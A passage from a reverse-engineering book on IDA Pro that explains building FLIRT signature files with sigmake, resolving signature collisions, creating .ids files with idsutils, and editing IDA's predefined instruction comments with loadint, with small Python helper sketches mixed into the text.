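def parse_pattern_line(line: str) -> PatternLine:
    """Split one pattern line into its leading fields and public names."""
    fields = line.split()
    lead, crc_length, crc16, total_length = fields[:4]
    if len(lead) != 64:
        raise ValueError("expected 64 characters of leading pattern")
    rest = fields[4:]
    # A field such as ":0000" is followed by the name defined at that offset.
    names = [rest[i + 1] for i in range(len(rest) - 1) if rest[i].startswith(":")]
    return PatternLine(lead, int(crc_length, 16), int(crc16, 16),
                       int(total_length, 16), names)


def wildcard_byte_count(lead: str) -> int:
    """Count byte positions in the leading pattern that are shown as dots."""
    return sum(1 for i in range(0, len(lead), 2) if lead[i:i + 2] == "..")
```

Applied to the _ffs line shown earlier, this yields a function length of 0x000D (13 bytes), which agrees with the 13 bytes of hex followed by 19 dotted positions in the leading pattern.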

7. The plb and pcf parsers may skip some functions depending on the command-line options

supplied to the parsers and the structure of the library being parsed.

8. At two characters per byte, 64 hexadecimal characters are required to display the contents of

32 bytes.

9. This is a 16-bit cyclic redundancy check value. The CRC16 implementation utilized for

pattern generation is included with the FLAIR tool distribution in the file crc16.cpp.


Several third-party programmers have created utilities designed to generate

patterns from existing IDA databases. One such utility is IDB_2_PAT,[10]

an IDA plug-in written by J.C. Roberts that is capable of generating patterns

for one or more functions in an existing database. Utilities such as these are

useful if you expect to encounter similar code in additional databases and

have no access to the original library files used to create the binary being

analyzed.

Creating Signature Files

Once you have created a pattern file for a given library, the next step in the

signature-creation process is to generate a .sig file suitable for use with IDA.

The format of an IDA signature file is substantially different from that of a

pattern file. Signature files utilize a proprietary binary format designed both

to minimize the amount of space required to represent all of the information

present in a pattern file and to allow for efficient matching of signatures

against actual database content. A high-level description of the structure of

a signature file is available on the Hex-Rays website.[11]

FLAIR’s sigmake utility is used to create signature files from pattern files.

By splitting pattern generation and signature generation into two distinct

phases, the signature-generation process is completely independent of the

pattern-generation process, which allows for the use of third-party pattern

generators. In its simplest form, signature generation takes place by using

sigmake to parse a .pat file and create a .sig file, as shown here:

$ ./sigmake libssl.pat libssl.sig

If all goes well, a .sig file is generated and ready to install into <IDADIR>/

sig. However, the process seldom runs that smoothly.

NOTE The sigmake documentation file, sigmake.txt, recommends that signature filenames

follow the MS-DOS 8.3 name-length convention. This is not a hard-and-fast require-

ment, however. When longer filenames are used, only the first eight characters of the

base filename are displayed in the signature-selection dialog.

Signature generation is often an iterative process, as it is during this phase

when collisions must be handled. A collision occurs anytime two functions

have identical patterns. If collisions are not resolved in some manner, it is

not possible to determine which function is actually being matched during

the signature-application process. Therefore, sigmake must be able to resolve

each generated signature to exactly one function name. When this is not

possible, based on the presence of identical patterns for one or more func-

tions, sigmake refuses to generate a .sig file and instead generates an exclusions

10. See http://www.openrce.org/downloads/details/26/IDB_2_PAT.

11. See http://www.hex-rays.com/idapro/flirt.htm.


file (.exc). A more typical first pass using sigmake and a new .pat file (or set of

.pat files) might yield the following.

$ ./sigmake libc_FreeBSD80.pat libc_FreeBSD80.sig

libc_FreeBSD80.sig: modules/leaves: 1088/1024, COLLISIONS: 10

See the documentation to learn how to resolve collisions.

The documentation being referred to is sigmake.txt, which describes the

use of sigmake and the collision-resolution process. In reality, each time sigmake

is executed, it searches for a corresponding exclusions file that might contain

information on how to resolve any collisions that sigmake may encounter while

processing the named pattern file. In the absence of such an exclusions file,

and when collisions occur, sigmake generates such an exclusions file rather

than a signature file. In the previous example, we would find a newly created

file named libc_FreeBSD80.exc. When first created, exclusions files are text files

that detail the conflicts that sigmake encountered while processing the pattern

file. The exclusions file must be edited to provide sigmake with guidance as to

how it should resolve the conflicting patterns. The general process for editing

an exclusions file follows.

When generated by sigmake, all exclusions files begin with the following

lines:

;--------- (delete these lines to allow sigmake to read this file)

; add '+' at the start of a line to select a module

; add '-' if you are not sure about the selection

; do nothing if you want to exclude all modules

The intent of these lines is to remind you what to do to resolve collisions

before you can successfully generate signatures. The most important thing to

do is delete the four lines that begin with semicolons, or sigmake will fail to

parse the exclusions file during subsequent execution. The next step is to

inform sigmake of your desire for collision resolution. A few lines extracted

from libc_FreeBSD80.exc appear here:

_index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_strchr 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_rindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_flsl 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

_fls 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

These lines detail three separate collisions. In this case, we are being told

that the function index is indistinguishable from strchr, rindex has the same

signature as strrchr, and flsl collides with fls. If you are familiar with any of

these functions, this result may not surprise you, as the colliding functions are

essentially identical (for example, index and strchr perform the same action).
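For a large exclusions file, it can be handy to list the collision groups before editing. The sketch below groups entries whose signature fields are identical, using the line layout shown in the excerpt (a name followed by the signature fields). It is a simplification of whatever sigmake does internally, and the function name collision_groups is hypothetical.

```python
from collections import defaultdict


def collision_groups(exclusion_lines):
    """Group function names whose remaining fields are identical.

    Returns a list of name lists, one per group of two or more names.
    """
    groups = defaultdict(list)
    for raw in exclusion_lines:
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # skip blank lines and the reminder comments
        name, *signature = line.split()
        # Ignore any +/- selection marker when reporting the name.
        groups[tuple(signature)].append(name.lstrip("+-"))
    return [names for names in groups.values() if len(names) > 1]
```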


In order to leave you in control of your own destiny, sigmake expects you

to designate no more than one function in each group as the proper function

for the associated signature. You select a function by prefixing the name with

a plus character (+) if you want the name applied anytime the corresponding

signature is matched in a database or a minus character (-) if you simply want

a comment added to the database whenever the corresponding signature is

matched. If you do not want any names applied when the corresponding

signature is matched in a database, then you do not add any characters. The

following listing represents one possible way to provide a valid resolution for

the three collisions noted previously:

+_index 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_strchr 00 0000 538B4424088A4C240C908A1838D974074084DB75F531C05BC3..............

_rindex 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_strrchr 00 0000 538B5424088A4C240C31C0908A1A38D9750289D04284DB75F35BC3..........

_flsl 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

-_fls 01 EF04 5531D289E58B450885C0741183F801B201740AD1E883C20183F80175F65D89D0

In this case we elect to use the name index whenever the first signature is

matched, do nothing at all when the second signature is matched, and have

a comment about fls added when the third signature is matched. The fol-

lowing points are useful when attempting to resolve collisions:

1. To perform minimal collision resolution, simply delete the four com-

mented lines at the beginning of the exclusions file.

2. Never add a +/- to more than one function in a collision group.

3. If a collision group contains only a single function, do not add a +/- in

front of that function; simply leave it alone.

4. Subsequent failures of sigmake cause data, including comment lines, to

be appended to any existing exclusions file. This extra data should be

removed and the original data corrected (if the data was correct, sigmake

would not have failed a second time) before rerunning sigmake.
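The first two rules lend themselves to a quick check before rerunning sigmake. The following sketch reports leftover comment lines and any collision group in which more than one function carries a + or - marker. It treats every line that starts with a semicolon as one that must be deleted, following the description above, and it identifies a group by its identical signature fields; check_exclusions is a hypothetical helper, not part of FLAIR.

```python
def check_exclusions(lines):
    """Return a list of human-readable problems found in an exclusions file."""
    problems = []
    marked = {}  # signature fields -> first marked name seen for that group
    for number, raw in enumerate(lines, start=1):
        line = raw.strip()
        if not line:
            continue
        if line.startswith(";"):
            problems.append(f"line {number}: comment line must be deleted")
            continue
        name, *signature = line.split()
        key = tuple(signature)
        if name[0] in "+-":
            if key in marked:
                problems.append(
                    f"line {number}: {name} conflicts with {marked[key]}")
            else:
                marked[key] = name
    return problems
```

An empty result does not guarantee that sigmake will succeed, only that these two common mistakes are absent.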

Once you have made appropriate changes to your exclusions file, you

must save the file and rerun sigmake using the same command-line arguments

that you used initially. The second time through, sigmake should locate, and

abide by, your exclusions file, resulting in the successful generation of a .sig

file. Successful operation of sigmake is noted by the lack of error messages and

the presence of a .sig file, as shown here:

$ ./sigmake libc_FreeBSD80.pat libc_FreeBSD80.sig

After a signature file has been successfully generated, you make it available

to IDA by copying it to your <IDADIR>/sig directory. Then your new signatures

are available using File ▸ Load File ▸ FLIRT Signature File.


Note that we have purposefully glossed over all of the options that can be

supplied to both the pattern generators and sigmake. A rundown of available

options is provided in plb.txt and sigmake.txt. The only option we will make

note of is the -n option used with sigmake. This option allows you to embed a

descriptive name inside a generated signature file. This name is displayed

during the signature-selection process (see Figure 12-1), and it can be very

helpful when sorting through the list of available signatures. The following

command line embeds the name string “FreeBSD 8.0 C standard library”

within the generated signature file:

$ ./sigmake -n"FreeBSD 8.0 C standard library" libc_FreeBSD80.pat libc_FreeBSD80.sig

As an alternative, library names can be specified using directives within

exclusion files. However, since exclusion files may not be required in all

signature-generation cases, the command-line option is generally more use-

ful. For further details, please refer to sigmake.txt.

Startup Signatures

IDA also recognizes a specialized form of signatures called startup signatures.

Startup signatures are applied when a binary is first loaded into a database in

an attempt to identify the compiler that was used to create the binary. If IDA

can identify the compiler used to build a binary, then additional signature

files, associated with the identified compiler, are automatically loaded during

the initial analysis of the binary.

Given that the compiler type is initially unknown when a file is first loaded,

startup signatures are grouped by and selected according to the file type of

the binary being loaded. For example, if a Windows PE binary is being loaded,

then startup signatures specific to PE binaries are loaded in an effort to

determine the compiler used to build the PE binary in question.

In order to generate startup signatures, sigmake processes patterns that

describe the startup routine[12] generated by various compilers and groups

the resulting signatures into a single type-specific signature file. The startup

directory in the FLAIR distribution contains the startup patterns used by

IDA, along with the script, startup.bat, used to create the corresponding

startup signatures from those patterns. Refer to startup.bat for examples of

using sigmake to create startup signatures for a specific file format.

In the case of PE files, you would notice several pe_*.pat files in the startup

directory that describe startup patterns used by several popular Windows

compilers, including pe_vc.pat for Visual Studio patterns and pe_gcc.pat for

Cygwin/gcc patterns. If you wish to add additional startup patterns for PE

files, you would need to add them to one of the existing PE pattern files or

create a new pattern file with a pe_ prefix in order for the startup signature-

generation script to properly find your patterns and incorporate them into

the newly generated PE signatures.

12. The startup routine is generally designated as the program’s entry point. In a C/C++

program, the purpose of the startup routine is to initialize the program’s environment prior to

passing control to the main function.

Library Recognition Using FLIRT Signatures 225

One last note about startup patterns concerns their format, which unfortu-

nately is slightly different from patterns generated for library functions. The

difference lies in the fact that a startup pattern line is capable of relating the

pattern to additional sets of signatures that should also be applied if a match

against the pattern is made. Other than the example startup patterns included

in the startup directory, the format of a startup pattern is not documented in

any of the text files included with FLAIR.

Summary

Automated library code identification is an essential capability that sig-

nificantly reduces the amount of time required to analyze statically linked

binaries. With its FLIRT and FLAIR capabilities, IDA makes such automated

code recognition not only possible but extensible by allowing users to create

their own library signatures from existing static libraries. Familiarity with the

signature-generation process is an essential skill for anyone who expects to

encounter statically linked binaries.

EXTENDING IDA’S KNOWLEDGE

By now it should be clear that a high-quality

disassembly is much more than a list of

mnemonics and operands derived from a

sequence of bytes. In order to make a disassembly

useful, it is important to augment the disassembly with

information derived from the processing of various

API-related data such as function prototypes and standard datatypes. In

Chapter 8 we discussed IDA’s handling of data structures, including how to

access standard API data structures and how to define your own custom data

structures. In this chapter, we continue our discussion of extending IDA’s

knowledge by examining the use of IDA’s idsutils and loadint utilities.

These utilities are available on your IDA distribution CD or via download

at the Hex-Rays download site.¹

1. See http://www.hex-rays.com/idapro/idadown.htm. A valid IDA username and password are

required.

228 Chapter 13

Augmenting Function Information

IDA derives its knowledge of functions from two sources: type library (.til)

files and IDS utilities (.ids) files. During the initial analysis phase, IDA uses

information stored in these files to both improve the accuracy of the dis-

assembly and make the disassembly more readable. It does so by incorporating

function parameter names and types as well as comments that have been

associated with various library functions.

In Chapter 8 we discussed type library files as the mechanism by which

IDA stores the layout of complex data structures. Type library files are also

the means by which IDA records information about a function’s calling

conventions and parameter sequence. IDA uses function signature informa-

tion in several ways. First, when a binary uses shared libraries, IDA has no way

to know what calling conventions may be employed by the functions in those

libraries. In such cases, IDA attempts to match library functions against their

associated signatures in a type library file. If a matching signature is found,

IDA can understand the calling convention used by the function and make

adjustments to the stack pointer as necessary (recall that stdcall functions

perform their own stack cleanup). The second use for function signatures is

to annotate the parameters being passed to a function with comments that

denote exactly which parameter is being pushed on the stack prior to calling

the function. The amount of information present in the comment depends

on how much information was present in the function signature that IDA was

able to parse. The two signatures that follow are both legal C declarations,

though the second provides more insight into the function, as it provides

formal parameter names in addition to datatypes.

LSTATUS __stdcall RegOpenKey(HKEY, LPCTSTR, PHKEY);

LSTATUS __stdcall RegOpenKey(HKEY hKey, LPCTSTR lpSubKey, PHKEY phkResult);

IDA’s type libraries contain signature information for a large number of

common API functions, including a substantial portion of the Windows API.

A default disassembly of a call to the RegOpenKey function is shown here:

.text:00401006 00C lea eax, [ebp+hKey] (Y)

.text:00401009 00C push eax (X) ; phkResult

.text:0040100A 010 push offset SubKey (Y) ; "Software\\Hex-Rays\\IDA"

.text:0040100F 014 push 80000001h (X) ; hKey

.text:00401014 018 call ds:RegOpenKeyA

.text:0040101A (Z) 00C mov [ebp+var_8], eax

Note that IDA has added comments in the right margin (X), indicating

which parameter is being pushed at each instruction leading up to the

call to RegOpenKey. When formal parameter names are available in the function

signature, IDA attempts to go one step further and automatically name

variables that correspond to specific parameters. In two cases in the preceding

example (Y), we can see that IDA has named a local variable (hKey) and a

global variable (SubKey) based on their correspondence with formal para-

meters in the RegOpenKey prototype. If the parsed function prototype had

contained only type information and no formal parameter names, then

the comments in the preceding example would name the datatypes of the

corresponding arguments rather than the parameter names. In the case of

the lpSubKey parameter, the parameter name is not displayed as a comment

because the parameter happens to point to a global string variable, and the

content of the string is being displayed using IDA’s repeating comment

facility. Finally, note that IDA has recognized RegOpenKey as a stdcall function

and automatically adjusted the stack pointer (Z) as RegOpenKey would do upon

returning. All of this information is extracted from the function’s signature,

which IDA also displays as a comment within the disassembly at the

appropriate import table location, as shown in the following listing:

.idata:0040A000 ; LSTATUS __stdcall RegOpenKeyA(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult)

.idata:0040A000 extrn RegOpenKeyA:dword ; CODE XREF: _main+14p

.idata:0040A000 ; DATA XREF: _main+14r

The comment displaying the function prototype comes from an IDA .til

file containing information on Windows API functions.
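
The stack-pointer column in the RegOpenKey listing can be reproduced with a few lines of arithmetic. The following Python sketch is only a model of the bookkeeping and makes no claim to match IDA's internal algorithm; the function name track_stack and the tuple encoding of instructions are invented for illustration, and 4-byte pushes (32-bit x86) are assumed.

```python
def track_stack(start_depth, instructions, purged_bytes):
    """Return the stack depth seen *before* each instruction executes.

    instructions : list of (mnemonic, callee) tuples; callee is None
                   except for calls.
    purged_bytes : dict mapping callee name -> bytes removed by the
                   callee on return (stdcall); missing names are
                   treated as purging nothing (cdecl-style).
    """
    depth = start_depth
    depths = []
    for mnemonic, callee in instructions:
        depths.append(depth)
        if mnemonic == "push":
            depth += 4  # assumption: every push is 4 bytes wide
        elif mnemonic == "call":
            depth -= purged_bytes.get(callee, 0)
    return depths


# Hypothetical encoding of the six instructions in the listing.
listing = [
    ("lea", None),
    ("push", None),
    ("push", None),
    ("push", None),
    ("call", "RegOpenKeyA"),
    ("mov", None),
]
depths = track_stack(0x00C, listing, {"RegOpenKeyA": 12})
print([f"{d:03X}" for d in depths])
```

With the 12-byte purge supplied, the final mov is reached at depth 00C, as in the listing. Passing an empty dictionary instead leaves the depth at 018 after the call, which is the kind of drift that missing calling-convention information can introduce.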

Under what circumstances might you wish to generate your own function

type signatures?² Whenever you encounter a binary that is linked, either

dynamically or statically, to a library for which IDA has no function prototype

information, you may want to generate type signature information for all

of the functions contained in that library in order to provide IDA with the

ability to automatically annotate your disassembly. Examples of such libraries

might include common graphics or encryption libraries that are not part of a

standard Windows distribution but that might be in widespread use. The

OpenSSL cryptographic library is one example of such a library.

Just as we were able to add complex datatype information to a database’s

local .til file in Chapter 8, we can add function prototype information to that

same .til file by having IDA parse one or more function prototypes via File ▸

Load File ▸ Parse C Header File. Similarly, you may use tilib.exe (see Chapter 8)

to parse header files and create standalone .til files, which can be made glo-

bally available by copying them into <IDADIR>/til.

This is all well and good when you happen to have access to source code

that you then allow IDA (or tilib.exe) to parse on your behalf. Unfortunately,

more often than you would like, you will have no access to source code, yet

you will want the same high-quality disassembly. How can you go about edu-

cating IDA if you have no source code for it to consume? This is precisely

the purpose of the IDS utilities, or idsutils. The IDS utilities are a set of three

utility programs used to create .ids files. We first discuss what a .ids file is and

then turn our attention to creating our own .ids files.

2. In this case we are using the term signature to refer to a function’s parameter type(s), quantity,

and sequence rather than a pattern of code to match the compiled function.

IDS Files

IDA uses .ids files to supplement its knowledge of library functions. A .ids

file describes the content of a shared library by listing every exported function

contained within the library. Information detailed for each function includes

the function’s name, its associated ordinal number,³ whether the function

utilizes stdcall, and if so, how many bytes the function clears from the stack

upon return, and optional comments to be displayed when the function is

referenced within a disassembly. In practice, .ids files are actually compressed

.idt files, with .idt files containing the textual descriptions of each library

function.

3. An ordinal number is an integer index associated with each exported function. The use of

ordinals allows a function to be located using an integer lookup table rather than by a slower

string comparison against the function’s name.

MANUALLY OVERRIDING PURGED BYTES

Library functions that make use of the stdcall calling convention can wreak havoc

with IDA’s stack-pointer analysis. Lacking any type library or .ids file information, IDA

has no way of knowing whether an imported function uses the stdcall convention.

This is significant, as IDA may not be able to properly track the behavior of the stack

pointer across calls to functions for which it has no calling convention information.

Beyond knowing that a function utilizes stdcall, IDA must also know exactly how

many bytes the function removes from the stack when the function completes. Lacking

information on calling conventions, IDA attempts to automatically determine whether

a function utilizes stdcall using a mathematical analysis technique known as the

simplex method.* Alternatively, users may intervene manually to specify the number

of purged bytes themselves. Figure 13-1 shows a specialized form of the function

editing dialog used for imported functions.

Figure 13-1: Editing an imported function

You can access this dialog by navigating to the import table entry for a given

function and then editing the function (Edit ▸ Functions ▸ Edit Function, or ALT-P). Note

the limited functionality of this particular dialog (as opposed to the Edit Function dialog

of Figure 7-7). Because this is an imported function entry, IDA has no access to the

compiled body of the function and therefore no associated information regarding the

structure of the function’s stack frame and no direct evidence that the function uses

the stdcall convention. Lacking such information, IDA sets the Purged bytes field to

-1, indicating that it does not know whether the function clears any bytes from the

stack upon return. To override IDA in such cases, enter the correct value for the

number of purged bytes, and IDA will incorporate the provided information into its

stack-pointer analysis wherever the associated function is called. In cases for which

IDA is aware of the behavior of the function (as in Figure 13-1), the Purged bytes

field may already be filled in. Note that this field is never filled in as a result of

simplex method analysis.

* Use of the simplex method as introduced in IDA version 5.1 is described in a blog post by

Ilfak here: http://www.hexblog.com/2006/06/.

When an executable file is first loaded into a database, IDA determines

which shared library files the executable depends on. For each shared library,

IDA searches for a corresponding .ids file in the <IDADIR>/ids hierarchy in

order to obtain descriptions of any library functions that the executable may

reference. It is important to understand that .ids files do not necessarily

contain function signature information. Therefore, IDA may not provide

function parameter analysis based on information contained solely in .ids

files. IDA can, however, perform accurate stack pointer accounting when a

.ids file contains correct information concerning the calling conventions

employed by functions and the number of bytes that the functions clear from

the stack. In situations where a DLL exports mangled names, IDA may be

able to infer a function’s parameter signature from the mangled name, in

which case this information becomes available when the .ids file is loaded.

We describe the syntax of .idt files in the next section. In this regard, .til files

contain more useful information with respect to disassembling function calls,

though source code is required in order to generate .til files.

Creating IDS Files

IDA’s idsutils utilities are used to create .ids files. The utilities include two

library parsers, dll2idt for extracting information from Windows DLLs and

ar2idt for extracting information from ar-style libraries. In both cases, the

output is a text .idt file containing a single line per exported function that

maps the exported function’s ordinal number to the function’s name. The

syntax for .idt files, which is very straightforward, is described in the readme.txt

file included with idsutils. The majority of lines in a .idt file are used to

describe exported functions according to the following scheme:

- An export entry begins with a positive number. This number represents

the ordinal number of the exported function.

- The ordinal number is followed by a space and then a Name directive

in the form Name=function, for example, Name=RegOpenKeyA. If the special

ordinal value zero is used, then the Name directive is used to specify the

name of the library described in the current .idt file, such as in this

example:

0 Name=advapi32.dll

- An optional Pascal directive may be used to specify that a function

uses the stdcall calling convention and to indicate how many bytes

the function removes from the stack upon return. Here is an example:

483 Name=RegOpenKeyA Pascal=12

- An optional Comment directive can be appended to an export entry to

specify a comment to be displayed with the function at each reference to

the function within a disassembly. A completed export entry might look

like the following:

483 Name=RegOpenKeyA Pascal=12 Comment=Open a registry key
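
The export-entry scheme above is simple enough to parse mechanically. The following Python sketch handles only the three directives described here (Name, Pascal, and Comment); the additional directives documented in the idsutils readme.txt are not covered. The function name parse_idt_line is hypothetical, and the code assumes that a Comment directive, when present, is the last directive on the line and runs to the end of the line.

```python
import re

# Matches "<ordinal> Name=<name>" followed by any remaining directives.
_ENTRY = re.compile(r"^(\d+)\s+Name=(\S+)(.*)$")


def parse_idt_line(line):
    """Parse one export entry; return a dict, or None for other lines."""
    match = _ENTRY.match(line.strip())
    if match is None:
        return None  # comment line, ALIGNMENT line, blank line, ...
    ordinal, name, rest = match.groups()
    entry = {"ordinal": int(ordinal), "name": name,
             "pascal": None, "comment": None}
    # Assumption: Comment, if present, is last and runs to end of line.
    rest, sep, comment = rest.partition("Comment=")
    if sep:
        entry["comment"] = comment.strip()
    pascal = re.search(r"\bPascal=(\d+)", rest)
    if pascal:
        entry["pascal"] = int(pascal.group(1))
    return entry


entry = parse_idt_line(
    "483 Name=RegOpenKeyA Pascal=12 Comment=Open a registry key")
print(entry)
```

An entry with ordinal zero comes back with the library name in the name field, so a caller can tell the two cases apart by testing the ordinal.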

Additional, optional directives are described in the idsutils readme.txt

file. The purpose of the idsutils parsing utilities is to automate, as much

as possible, the creation of .idt files. The first step in creating a .idt file is to

obtain a copy of the library that you wish to parse; the next step is to parse it

using the appropriate parsing utility. If we wished to create a .idt file for the

OpenSSL-related library ssleay32.dll, we would use the following command:

$ ./dll2idt.exe ssleay32.dll

File: ssleay32.dll ... ok

Successful parsing in this case results in a file named SSLEAY32.idt.

The difference in capitalization between the input filename and the output

filename is due to the fact that dll2idt derives the name of the output file

based on information contained within the DLL itself. The first few lines of

the resulting .idt file are shown here:

ALIGNMENT 4

;DECLARATION

;

0 Name=SSLEAY32.dll

;

121 Name=BIO_f_ssl

173 Name=BIO_new_buffer_ssl_connect

122 Name=BIO_new_ssl

174 Name=BIO_new_ssl_connect

124 Name=BIO_ssl_copy_session_id

Note that it is not possible for the parsers to determine whether a func-

tion uses stdcall and, if so, how many bytes are purged from the stack. The

addition of any Pascal or Comment directives must be performed manually using

a text editor prior to creating the final .ids file. The final steps for creating

a .ids file are to use the zipids utility to compress the .idt file and then to copy the

resulting .ids file to <IDADIR>/ids.

$ ./zipids.exe SSLEAY32.idt

File: SSLEAY32.idt ... {219 entries [0/0/0]} packed

$ cp SSLEAY32.ids ../Ida/ids
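
Because Pascal directives must be added by hand before zipids is run, a short script can remove some of the tedium when the argument count of each stdcall function is already known. The sketch below assumes 32-bit x86 stdcall functions whose arguments each occupy 4 bytes on the stack; the helper name add_pascal_directives and the arg_counts table are hypothetical. It uses the RegOpenKeyA entry from earlier in the chapter (three arguments, hence 12 bytes) rather than any OpenSSL function, since nothing here establishes which calling convention the OpenSSL exports use.

```python
def add_pascal_directives(idt_text, arg_counts, arg_size=4):
    """Add Pascal=<bytes> to export entries whose names are in arg_counts."""
    out = []
    for line in idt_text.splitlines():
        fields = line.split()
        is_entry = (len(fields) >= 2 and fields[0].isdigit()
                    and fields[1].startswith("Name="))
        if is_entry and "Pascal=" not in line:
            name = fields[1][len("Name="):]
            if name in arg_counts:
                # Insert right after the Name directive so that any
                # trailing Comment directive stays last on the line.
                fields.insert(2, f"Pascal={arg_counts[name] * arg_size}")
                # Note: rejoining collapses runs of whitespace.
                line = " ".join(fields)
        out.append(line)
    return "\n".join(out)


sample = "0 Name=advapi32.dll\n483 Name=RegOpenKeyA Comment=Open a registry key"
annotated = add_pascal_directives(sample, {"RegOpenKeyA": 3})
print(annotated)
```

Lines that are not export entries, and entries that already carry a Pascal directive, pass through unchanged.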

At this point, IDA loads SSLEAY32.ids anytime a binary that links to

ssleay32.dll is loaded. If you elect not to copy your newly created .ids files into

<IDADIR>/ids, you can load them at any time via File ▸ Load File ▸ IDS File.

An additional step in the use of .ids files allows you to link .ids files to

specific .sig or .til files. When you choose .ids files, IDA utilizes an IDS config-

uration file named <IDADIR>/ids/idsnames. This text file contains lines to

allow for the following:

- Map a shared library name to its corresponding .ids filename. This allows

IDA to locate the correct .ids file when a shared library name does not

translate neatly to an MS-DOS–style 8.3 filename as with the following:

libc.so.6 libc.ids +

- Map a .ids file to a .til file. In such cases, IDA automatically loads the

specified .til file whenever it loads the specified .ids file. The following

example would cause openssl.til to be loaded anytime SSLEAY32.ids is

loaded (see idsnames for syntax details):

SSLEAY32.ids SSLEAY32.ids + openssl.til

- Map a .sig file to a corresponding .ids file. In this case, IDA loads the

indicated .ids file anytime the named .sig file is applied to a disassembly.

The following line directs IDA to load SSLEAY32.ids anytime a user applies

the libssl.sig FLIRT signature:

libssl.sig SSLEAY32.ids +
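
The three example lines above share one visible shape: a source name, a .ids filename, a plus sign, and an optional .til filename. The following Python sketch splits a line along exactly that shape. It is inferred solely from these three examples and is not a description of the full idsnames syntax, for which the idsnames file itself remains the reference; the function name parse_idsnames_line is hypothetical.

```python
def parse_idsnames_line(line):
    """Split one mapping line into (source, ids_file, til_file or None).

    Only the "<source> <ids file> + [<til file>]" shape seen in the
    examples is recognized; anything else yields None.
    """
    fields = line.split()
    if len(fields) < 3 or fields[2] != "+":
        return None
    source, ids_file = fields[0], fields[1]
    til_file = fields[3] if len(fields) > 3 else None
    return source, ids_file, til_file


for text in ("libc.so.6 libc.ids +",
             "SSLEAY32.ids SSLEAY32.ids + openssl.til",
             "libssl.sig SSLEAY32.ids +"):
    print(parse_idsnames_line(text))
```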

In Chapter 15 we will look at a script-oriented alternative to the library

parsers provided by idsutils, and we’ll leverage IDA’s function-analysis

capabilities to generate more descriptive .idt files.

Augmenting Predefined Comments with loadint

In Chapter 7 we covered IDA’s concept of auto comments, which, when enabled,

cause IDA to display comments describing each assembly language instruction.

Two examples of such comments are shown in the following listing:

.text:08048654 lea ecx, [esp+arg_0] ; Load Effective Address

.text:08048658 and esp, 0FFFFFFF0h ; Logical AND

The source of these predefined comments is the file <IDADIR>/ida.int,

which contains comments sorted first by CPU type and second by instruction

type. When auto comments are turned on, IDA searches for comments

associated with each instruction in the disassembly and displays them in the

right margin if they are present in ida.int.

The loadint⁴ utilities provide you with the ability to modify existing

comments or add new comments to ida.int. As with the other add-on utilities

we have discussed, loadint is documented in a readme.txt file included with the

loadint distribution. The loadint distribution also contains the predefined

4. The current version is loadint61.zip.

comments for all of IDA’s processor modules in the form of numerous .cmt

files. Modifying existing comments is a simple matter of locating the comment

file associated with your processor of interest (for example, pc.cmt for x86),

making changes to any comments whose text you wish to modify, running

loadint to re-create the ida.int comment file, and finally copying the resulting

ida.int file into your main IDA directory, where it will be loaded the next time

IDA is launched. A simple run to rebuild the comment database looks like

the following:

$ ./loadint comment.cmt ida.int

17566 cases, 17033 strings, total length: 580575

Examples of changes that you might wish to make include modifying exist-

ing comments or enabling comments for instructions that have no assigned

comment. In the pc.cmt file, for example, several of the more common instruc-

tions are commented out so as not to generate too many comments when

auto comments are enabled. The following lines, extracted from pc.cmt,

demonstrate that x86 mov instructions do not generate comments by default:

NN_ltr: "Load Task Register"

//NN_mov: "Move Data"

NN_movsp: "Move to/from Special Registers"

Should you wish to enable comments for mov instructions, you would

uncomment the middle line and rebuild the comment database as detailed

previously.
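
The uncommenting step is usually done in a text editor, but it can also be scripted. The following Python sketch assumes the layout shown in the pc.cmt excerpt above, in which a disabled entry is an ordinary entry prefixed with two slashes; the function name enable_comment is hypothetical. After rewriting the file, loadint would still have to be run to rebuild ida.int.

```python
def enable_comment(cmt_text, instruction):
    """Uncomment the entry for `instruction` (e.g. "NN_mov") if disabled."""
    out = []
    for line in cmt_text.splitlines():
        stripped = line.lstrip()
        if stripped.startswith("//"):
            candidate = stripped[2:].lstrip()
            # Require the trailing colon so NN_mov does not match NN_movsp.
            if candidate.startswith(instruction + ":"):
                line = candidate
        out.append(line)
    return "\n".join(out)


excerpt = "\n".join([
    'NN_ltr: "Load Task Register"',
    '//NN_mov: "Move Data"',
    'NN_movsp: "Move to/from Special Registers"',
])
print(enable_comment(excerpt, "NN_mov"))
```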

A note buried within the documentation for loadint points out that

loadint must be able to locate the file ida.hlp, which is included with your IDA

distribution. If you receive the following error message, you should copy

ida.hlp into your loadint directory and then rerun loadint.

$ ./loadint comment.cmt ida.int

Can't initialize help system.

File name: 'ida.hlp', Reason: can't find file (take it from IDA distribution).

Alternatively, you may use the -n switch with loadint to specify the location

of <IDADIR>, as shown in the following command line:

$ ./loadint -n <IDADIR> comment.cmt ida.int

The file comment.cmt serves as the master input file to the loadint process.

The syntax for this file is described in the loadint documentation. In a nutshell,

comment.cmt creates the mappings from processor types to associated comment

files. Individual processor-specific comment files in turn specify the mappings

from specific instructions to the associated comment text for each instruction.

The entire process is governed by several sets of enumerated (C-style enums)

constants that define all of the processor types (found in comment.cmt) and all

of the possible instructions for each processor (found in allins.hpp).

If you want to add predefined comments for a completely new processor

type, the process is somewhat more involved than simply changing existing

comments and is fairly closely linked to the process for creating new processor

modules (see Chapter 19). Without diving too deeply into processor modules,

providing comments for a completely new processor type requires that you

first create a new enumerated constant set (shared with your processor

module) within allins.hpp that defines one constant for each instruction in

the instruction set of interest. Second, you must create a comment file that

maps each enumerated instruction constant to its associated comment text.

Third, you must define a new constant for your processor type (again, shared

with your processor module) and create an entry in comment.cmt that maps

your processor type to its associated comment file. Once you have completed

these steps, you must run loadint to build a new comment database that

incorporates your new processor type and associated comments.

Summary

While idsutils and loadint may not seem immediately useful to you, you will

learn to appreciate their capabilities once you begin to step outside IDA’s

more common use cases. For a relatively small investment of time, the creation

of a single .ids or .til file can save you countless hours whenever you encounter

